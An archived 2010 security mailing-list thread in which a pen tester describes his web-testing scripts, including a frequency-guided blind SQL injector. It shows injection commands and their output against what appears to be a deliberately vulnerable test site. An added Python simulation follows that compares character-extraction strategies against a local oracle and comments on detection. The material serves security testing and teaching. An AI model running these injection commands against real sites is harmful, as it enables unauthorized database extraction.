Not at all, but let me clean them up a bit first. I have a few small errors to 
fix, then I'll post them to the pdc blog.

-----Original Message-----
From: [email protected] 
[mailto:[email protected]] On Behalf Of Robin Wood
Sent: Sunday, September 05, 2010 11:49 AM
To: PaulDotCom Security Weekly Mailing List
Subject: Re: [Pauldotcom] Misc Web Pen testing scripts

Would you mind if I added these to the PenTester Scripting website 
http://www.pentesterscripting.com/ ?

Robin

On 3 September 2010 17:31, Baggett, Mark <[email protected]> wrote:
> I'm trying to learn python.  Userpass.py was my first python script.
> (http://pauldotcom.com/2010/08/draft---creating-per-user-cust.html)
> Eventually, I am going to write something that doesn't completely suck.
> These scripts are still a work in progress.  Send me comments and 
> suggestions off list.  I hope they are useful. If you find errors 
> before I post these to the blog I'd appreciate a heads up.
>
> Thanks
> Mark Baggett
>
> 1)get2post.py
> Use to demonstrate POST based XSS attacks to a customer.  Put get2post 
> on a single host then you can create URLs with the POST values for 
> the customer.  Same functionality as 
> http://www.whiteacid.org/misc/xss_post_forwarder.php but on your own 
> server so you are not disclosing a customer's XSS issues to a third 
> party.
>
> 2)p0wnpr0xy.py
> Grabs URLs & cookies as you browse and launches the tool of choice.
> Here is a demo video http://www.vimeo.com/14667308
>
> 3)sqlinjector.py
> This is a MySQL blind SQL injector that uses a much different SQL 
> injection technique.  Instead of repeatedly cutting the alphabet in 
> half or brute forcing the letters it uses a per letter frequency table 
> to predict the next letter.  For example, if you have a Q there is a 
> HIGH probability that the next letter is a U. The technique is 
> discussed and outlined here:
> http://www.exploit-db.com/papers/13696/  47 fewer guesses than 
> bsqlbf.pl!  79 vs 126
>
> I implemented this technique in python.  You give the script a 
> vulnerable URL, and you put your SQL query in the URL with carets as 
> markers at the point of injection.  This syntax enables flexible URL 
> endings.
>
> mark.baggett$ $ python sqlinjector.py
> "http://testphp.vulnweb.com/listproducts.php?cat=1^database()^#"
> a
> ac
> acu
> acua
> acuar
> acuart
> end of word found
> Found target acuart in 79 guesses.
> mtcexcp007:misc mark.baggett$
>
> mark.baggett$ perl bsqlbf.pl -blind cat -sql "database()" -url
> http://testphp.vulnweb.com/listproducts.php?cat=1
>
>  // Blind SQL injection brute force.
>  // [email protected] / http://www.514.es
>
> <truncated>
>  trying: acuart#### results:
>  database() = acuart
>  total hits: 126
>
>
>
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>
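The guess-count comparison Mark describes for sqlinjector.py, as an added simulation that is not part of his scripts or of bsqlbf.pl: both strategies extract a secret from a local yes/no oracle (a plain Python function, no network or SQL), and the oracle counts every question asked. The training word list is a constructed assumption standing in for a real letter-frequency table.

```python
import string
from collections import Counter
END = "$"                       # sentinel meaning "end of word"
ALPHABET = string.ascii_lowercase + string.digits + "_" + END
# Constructed training list (assumption); a real table comes from a large corpus.
TRAINING_WORDS = ["acunetix", "actor", "account", "quart", "quick", "users", "database", "start"]

class Oracle:
    """Stand-in for the blind yes/no oracle; counts every question asked."""
    def __init__(self, secret):
        self.secret, self.calls = secret + END, 0
    def eq(self, i, c):         # "is the character at position i equal to c?"
        self.calls += 1
        return self.secret[i] == c
    def le(self, i, c):         # "does the character at position i sort at or before c?"
        self.calls += 1
        return ALPHABET.index(self.secret[i]) <= ALPHABET.index(c)

def binary_search_extract(oracle):
    """Classic approach: halve the alphabet at every position (5-6 questions per char)."""
    word = ""
    while True:
        lo, hi = 0, len(ALPHABET) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.le(len(word), ALPHABET[mid]):
                hi = mid
            else:
                lo = mid + 1
        if ALPHABET[lo] == END:
            return word
        word += ALPHABET[lo]

def build_tables(words):
    bigrams, unigrams = Counter(), Counter()   # '^' marks word start, END the end
    for w in words:
        text = "^" + w + END
        bigrams.update(zip(text, text[1:]))
        unigrams.update(text[1:])
    return bigrams, unigrams

def frequency_extract(oracle, bigrams, unigrams):
    """Frequency approach: try candidates most likely after the previous letter first."""
    word, prev = "", "^"
    while True:
        order = sorted(ALPHABET, key=lambda c: (-bigrams[(prev, c)], -unigrams[c]))
        c = next(c for c in order if oracle.eq(len(word), c))
        if c == END:
            return word
        word, prev = word + c, c
```

The question count is exactly what a request-count or error-rate detection sees: with this small table, "acuart" costs 39 questions by halving and 11 by frequency ordering, so thresholds tuned for halving-style extraction undercount the frequency-guided kind.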